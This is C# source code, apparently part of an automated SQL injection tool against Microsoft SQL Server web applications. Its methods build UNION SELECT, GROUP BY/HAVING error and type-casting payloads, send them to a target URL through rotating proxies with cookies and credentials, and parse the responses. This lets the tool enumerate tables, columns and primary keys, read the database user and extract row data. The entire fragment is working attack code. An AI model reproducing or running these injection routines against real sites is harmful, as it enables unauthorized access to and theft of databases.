private void TypeCastAttackVector()
{
StringBuilder CurrentVector = new StringBuilder();
for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
{
UserStatus(String.Format("Counter is at {0} of {1}", FieldCounter, _QueryStructure.Count));
CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer).Append(" UNION SELECT SUM(");
CurrentVector.Append(((GlobalDS.Field)_QueryStructure[FieldCounter]).FullName);
CurrentVector.Append(") FROM ");
CurrentVector.Append(((GlobalDS.Field)_QueryStructure[FieldCounter]).TableName);
CurrentVector.Append("--");
_AttackParams[_VectorName] = CurrentVector.ToString();
string ResultPage;
UserStatus(String.Format("hmm: {0}", CurrentVector.ToString()));
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
GlobalDS.Field dbg = (GlobalDS.Field)_QueryStructure[FieldCounter];
dbg.DataType = ParsePage.ParseUnionSumError(ResultPage, _Plugin);
// ## DEBUG
UserStatus(String.Format("Resulting Data: {0} - {1}", dbg.FullName, dbg.DataType));
_QueryStructure[FieldCounter] = dbg;
}
UserStatus("Finished Typecasting..");
}
private GlobalDS.Field GetFieldData(long TableID, int FieldID)
{
GlobalDS.Field retVal = new GlobalDS.Field();
StringBuilder WhereClause = new StringBuilder();
WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
string[] values = PulledData.Split(':');
retVal.FieldName = values[0];
retVal.DataType = GetSqlDataType(Convert.ToInt64(values[1].Trim()));
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
if (PulledData.Length > 0)
{
PulledData = PulledData.Substring(1, PulledData.Length - 1);
retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
}
return(retVal);
}
private GlobalDS.Table RetrieveTable(long PreviousTableID)
{
GlobalDS.Table retVal = new GlobalDS.Table();
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());
string ResultPage, ResultText;
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
string[] values = ResultText.Split(':');
retVal.Name = values[0];
retVal.ObjectID = Convert.ToInt64(values[1]);
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
if (ResultText.Length > 0)
{
ResultText = ResultText.Substring(1, ResultText.Length - 1);
retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
}
else
{
retVal.RecordCount = -1;
}
return(retVal);
}
private void EnumerateAttackVector()
{
StringBuilder CurrentVector;
// Initiate "Having" enumeration
GlobalDS.Field newField;
_QueryStructure = new List <GlobalDS.Field>();
do
{
CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer);
// This is where the GROUP BY clause is added
if (_QueryStructure.Count > 0)
{
CurrentVector.Append(" GROUP BY");
for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
{
CurrentVector.Append(" ");
CurrentVector.Append(((GlobalDS.Field)_QueryStructure[FieldCounter]).FullName);
CurrentVector.Append(",");
}
CurrentVector.Remove(CurrentVector.Length - 1, 1);
}
CurrentVector.Append(" HAVING 1=1");
if (_Options.TerminateQuery)
{
CurrentVector.Append("--");
}
_AttackParams[_VectorName] = CurrentVector.ToString();
string ResultPage;
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
System.Console.WriteLine(ResultPage);
newField = ParsePage.ParseGroupedHaving(ResultPage, _Plugin);
if (newField.FieldName.Length > 0)
{
_QueryStructure.Add(newField);
UserStatus(String.Format("QueryStructure Size After adding: {0}", _QueryStructure.Count));
}
else
{
UserStatus(ResultPage);
}
}while (newField.FieldName.Length > 0);
System.Console.WriteLine("Done Enumeration, I think");
}
private void RefinedTypeCasting()
{
StringBuilder CurrentVector = new StringBuilder();
List <int> IntList = FindAllVariInts(_QueryStructure);
for (int IntCounter = 0; IntCounter < IntList.Count; IntCounter++)
{
UserStatus("Refining Integer #" + IntCounter);
CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer).Append(" UNION ALL SELECT ");
for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
{
if (FieldCounter == (int)IntList[IntCounter] || ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.VarChar ||
((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Char ||
((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.NVarChar)
{
//CurrentVector.Append("@@version,");
CurrentVector.Append("char(0x61),");
} // Text and NText are a pain in the ASS
else if (((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Text ||
((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.NText ||
((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Variant)
{
CurrentVector.Append("NULL,");
}
else
{
UserStatus(String.Format("Refining {0}", ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType));
CurrentVector.Append("1,");
}
}
CurrentVector.Remove(CurrentVector.Length - 1, 1);
CurrentVector.Append(" ORDER BY 1--");
_AttackParams[_VectorName] = CurrentVector.ToString();
string ResultPage;
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
GlobalDS.Field AdjustedField = (GlobalDS.Field)_QueryStructure[(int)IntList[IntCounter]];
AdjustedField.DataType = ParsePage.ParseUnionSelectForIntegerRefinement(ResultPage, _Plugin);
_QueryStructure[(int)IntList[IntCounter]] = AdjustedField;
}
UserStatus("Finished Refining Typecasts");
}
private long GetTableCount()
{
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58)+convert(char,count(name))+char(58)", "sysobjects", "xtype=char(85)");
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string PulledCount = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
PulledCount = PulledCount.Substring(1, PulledCount.Length - 2).Trim();
return(Convert.ToInt64(PulledCount));
}
/// <summary>
/// Pull the username the database is running as
/// </summary>
/// <returns>The database username</returns>
public string GetDatabaseUsername()
{
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(40) + SYSTEM_USER + char(41)", null, null);
string ResultPage;
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string Username = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
return(Username.Substring(1, Username.Length - 2)); // remove brackets
}
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
{
StringBuilder WhereClause = new StringBuilder();
if (CurrentPrimaryKey.Name == KeyName)
{
WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
}
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
ResultText = ResultText.Substring(1, ResultText.Length - 2);
string WorkingText = "";
switch (PrimaryKeyType)
{
case SqlDbType.VarChar:
case SqlDbType.Char:
case SqlDbType.NChar:
case SqlDbType.NText:
case SqlDbType.NVarChar:
case SqlDbType.Text:
StringBuilder ElementBuilder = new StringBuilder();
//split
char[] TextElements = ResultText.ToCharArray();
for (int i = 0; i < TextElements.Length; i++)
{
ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
}
ElementBuilder.Remove(ElementBuilder.Length - 2, 2); // remove trailing '+ '
WorkingText = ElementBuilder.ToString();
break;
default:
WorkingText = ResultText.Trim();
break;
}
GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
retVal.Name = KeyName;
retVal.Value = WorkingText;
retVal.OutputValue = ResultText;
return(retVal);
}
// }}}
// {{{ GetFieldData
private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
{
DictionaryEntry retVal = new DictionaryEntry();
retVal.Key = Column.FieldName;
retVal.Value = string.Empty;
if (Column.FieldName.Equals(pk.Name))
{
retVal.Value = pk.Value;
return(retVal);
}
StringBuilder SelectClause = new StringBuilder();
switch (Column.DataType)
{
case SqlDbType.BigInt:
case SqlDbType.SmallInt:
case SqlDbType.TinyInt:
case SqlDbType.Int:
case SqlDbType.Decimal:
case SqlDbType.DateTime:
case SqlDbType.Money:
case SqlDbType.Float:
case SqlDbType.Real:
case SqlDbType.SmallDateTime:
case SqlDbType.SmallMoney:
case SqlDbType.Timestamp:
case SqlDbType.UniqueIdentifier:
//retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk);
SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
break;
case SqlDbType.NChar:
case SqlDbType.Char:
case SqlDbType.NVarChar:
case SqlDbType.Text:
case SqlDbType.NText:
case SqlDbType.VarChar:
//retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk);
SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
break;
case SqlDbType.Bit:
//retVal.Value = GetBitField(Column.FieldName, TableName, pk);
SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
break;
case SqlDbType.Image:
case SqlDbType.Binary:
case SqlDbType.VarBinary:
// TODO: Figure out how to support this!
//retVal.Value = null;
break;
}
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value);
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
retVal.Value = ResultText.Substring(1, ResultText.Length - 2);
return(retVal);
}